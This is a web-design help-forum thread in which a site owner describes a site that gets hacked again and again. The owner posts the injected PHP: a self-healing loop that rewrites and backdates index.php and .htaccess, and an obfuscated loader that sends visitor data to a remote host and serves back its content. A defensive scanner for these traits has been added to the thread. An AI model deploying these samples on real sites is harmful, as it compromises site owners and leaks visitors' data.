WebSite X5 Help Center

 
A. Pais
User

Hack website  en

Author: A. Pais
Viewed 369, Followers 1, Posted 0

For about 4 months now, I have been hacked every week.
I have already tried deleting the whole folder, and I deleted the altered files, and every time I upload the clean files, after a few days the same thing happens.
I think there is a vulnerability in some file through which the hacker manages to access the space. Can you help if I send you the files for analysis?
I am frustrated and have already gone back to the old program (website x5 evo12), since it was always secure.
Can you help me?

Posted
10 Replies
Claudio D.
Moderator
Top user of the month IT

What exactly do you mean by “hacked”?

The only vulnerabilities might be in the PHP files if you use a deprecated version of PHP, but the chances are very low.

I think that:
- either you have extra code from a dubious source (counters, for example),
- or they have your FTP password.

Anyway, version 12 is more vulnerable.

Have you changed the FTP password yet?
Do you have extra codes?
Do you use FTPS to transfer the site to the host?

Explain well what you mean by “hacked”.



Posted by Claudio D.
Alvin L.
User

Looks like you are using MyBB for your forums. You might see if they have an upgrade. Your hosting provider should offer the ability to block IPs. Most likely they are coming from a short list of IPs.

Posted by Alvin L.
A. Pais
User
Author

Yes, I use MyBB, but I think it is not there. Yesterday I deactivated the plugins, and it is the same. Every time I delete these 3 files, before long they reappear, and my index is put with ".old", like in the screenshot. I can share the files; they don't have a virus, but someone can see what they mess with.

Posted by A. Pais
Claudio D.
Moderator
Top user of the month IT

Have you reset and changed the FTP password?

What version of MyBB?

What version of PHP?

Posted by Claudio D.
A. Pais
User
Author

I reset the FTP password, like 5 times.

My version of MyBB is the latest, 1.38.

The PHP version I can see in cPanel is 7.3 (current).

Posted by A. Pais
Alvin L.
User

You should upgrade your PHP to 8.1.  My hosting does not even support PHP v7.x anymore.

Posted by Alvin L.
A. Pais
User
Author

I will consider it in the next update of MyBB, but I think it is not from there.

This is the code that appears:

I.php

<?php unlink('/home/ptumcom/public_html/l.php');$index_path = '/tmp' ."/index.php";
$index_content = file_get_contents($index_path);
$index_md5 = md5($index_content);
$htaccess_path = '/tmp' ."/.htaccess";
$htaccess_content = file_get_contents($htaccess_path);
$htaccess_md5 = md5($htaccess_content);

while (true)
{
$temp_md5 = @md5(file_get_contents($index_path));
if (!file_exists($index_path) || $temp_md5 != $index_md5) {
@file_put_contents($index_path, $index_content);
@touch($index_path, strtotime("-400 days", time()));
@chmod($index_path, 0444);
}
$temp_md5 = @md5(file_get_contents($htaccess_path));
if (!file_exists($htaccess_path) || $temp_md5 != $htaccess_md5) {
@file_put_contents($htaccess_path, $htaccess_content);
@touch($htaccess_path, strtotime("-400 days", time()));
@chmod($htaccess_path, 0444);
}
sleep(1);
}"

and in new index.php

This is the change

"function h($url, $pf = '') { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_USERAGENT, 'h'); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_FRESH_CONNECT, TRUE); if ($pf != '') { curl_setopt($ch, CURLOPT_POST, 1); if(is_array($pf)){ curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($pf)); } } $r = curl_exec($ch); curl_close($ch); if ($r) { return $r; } return ''; } function h2() { if (file_exists('robots'.'.txt')){ @unlink('robots'.'.txt'); } $htaccess = '.'.'htaccess'; $content = @base64_decode("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"); if (file_exists($htaccess)) { $htaccess_content = file_get_contents($htaccess); if ($content == $htaccess_content) { return; } } @chmod($htaccess, 0777); @file_put_contents($htaccess, $content); @chmod($htaccess, 0644); } $api = base64_decode('aHR0cDovLzYwMTItY2g0LXYyNjYuaW1nMTB5YWhvby5jb20='); $params['domain'] =isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : $_SERVER['SERVER_NAME']; $params['request_url'] = $_SERVER['REQUEST_URI']; $params['referer'] = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : ''; $params['agent'] = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : ''; $params['ip'] = isset($_SERVER['HTTP_VIA']) ? $_SERVER['HTTP_X_FORWARDED_FOR'] : $_SERVER['REMOTE_ADDR']; if($params['ip'] == null) {$params['ip'] = "";} $params['protocol'] = isset($_SERVER['HTTPS']) ? 'https://' : 'http://' $params['language'] = isset($_SERVER['HTTP_ACCEPT_LANGUAGE']) ? 
$_SERVER['HTTP_ACCEPT_LANGUAGE'] : ''; if (isset($_REQUEST['params'])) {$params['api'] = $api;print_r($params);die();} h2(); $try = 0; while($try < 3) { $content = h($api, $params); $content = @gzuncompress(base64_decode($content)); $data_array = @preg_split("/\|/si", $content, -1, PREG_SPLIT_NO_EMPTY);/*S0vMzEJElwPNAQA=$cAT3VWynuiL7CRgr*/ if (!empty($data_array)) { $data = array_pop($data_array); $data = base64_decode($data); foreach ($data_array as $header) { @header($header); } echo $data; die(); } $try++; } ?>
<!DOCTYPE html><!-- HTML5 -->"

Posted by A. Pais
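
A defender-side check built from the traits visible in the two PHP samples above, as an added example that is not part of the original thread: it walks a web root and flags files showing the rewrite-and-sleep loop, the backdated timestamps, the 0444 permissions on `index.php`/`.htaccess`, or the fetch-and-echo loader. The function names, rule labels and the 30-day skew threshold are assumptions made for this example.

```python
import os
import re
import stat

# Traits taken from the two PHP samples posted in this thread (labels are hypothetical).
CONTENT_RULES = {
    "self-healing loop": [r"while\s*\(\s*true\s*\)", r"file_put_contents\s*\(", r"sleep\s*\("],
    "timestamp backdating": [r"touch\s*\([^;]*strtotime\s*\(\s*[\"']-\d+\s*days"],
    "remote content loader": [r"curl_exec\s*\(", r"gzuncompress\s*\(\s*base64_decode"],
    "self-deleting dropper": [r"^\s*<\?php\s+unlink\s*\("],
}
DAY = 86400


def scan_file(path, max_skew_days=30):
    """Return the list of reasons why `path` resembles the files in the thread."""
    reasons = []
    st = os.stat(path)
    # PHP touch() rewrites mtime, but POSIX sets ctime to "now" on that call,
    # so an mtime far older than ctime points to a backdated file.
    if st.st_ctime - st.st_mtime > max_skew_days * DAY:
        reasons.append("mtime predates ctime")
    name = os.path.basename(path).lower()
    if name in ("index.php", ".htaccess") and stat.S_IMODE(st.st_mode) == 0o444:
        reasons.append("read-only 0444 on " + name)
    if name.endswith(".php"):
        with open(path, "r", errors="replace") as fh:
            text = fh.read(1_000_000)  # cap the read; implants are small
        for label, patterns in CONTENT_RULES.items():
            if all(re.search(p, text, re.I | re.M) for p in patterns):
                reasons.append(label)
    return reasons


def scan_tree(root):
    """Walk `root` and return {path: reasons} for every flagged file."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            full = os.path.join(dirpath, fname)
            reasons = scan_file(full)
            if reasons:
                hits[full] = reasons
    return hits
```

A file uploaded with its original timestamps preserved also trips the mtime check, so hits are leads to review rather than proof.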
A. Pais
User
Author

OK, I think I figured out the problem.
I made a search in file I.php and got some results relating to Facebook. I have a code and plugin in my index, so I removed them. Let's see if they appear again. Hope not ;)

Posted by A. Pais
Glaucio M.
User

Friend, the problem is on your server. If it is a single account, the FTP may have been broken into and some malicious code planted. Most of the time it gets broken into because it is shared hosting! Hold the company responsible for your hosting to account!

Posted by Glaucio M.
A. Pais
User
Author

The problem is not the Facebook plugin. I will try to make a fresh MyBB install and see if the problem remains.

I will give news.

Posted by A. Pais